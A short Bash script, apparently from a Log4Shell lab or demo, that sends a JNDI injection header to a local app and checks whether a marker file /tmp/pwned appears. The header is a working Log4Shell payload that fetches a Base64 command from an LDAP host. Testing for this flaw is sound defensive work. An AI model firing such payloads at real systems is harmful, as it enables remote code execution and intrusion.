13 lines
322 B
Bash
13 lines
322 B
Bash
#!/bin/bash
|
|
curl app:8080 -H 'X-Api-Version: ${jndi:ldap://jndi:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
|
|
sleep 5
|
|
|
|
filename=/tmp/pwned
|
|
if [ -f "$filename" ];
|
|
then
|
|
echo "Regrettably, you've been pwned :("
|
|
echo "This configuration is vulnerable to log4shell"
|
|
else
|
|
echo "It looks like you're safe!"
|
|
fi
|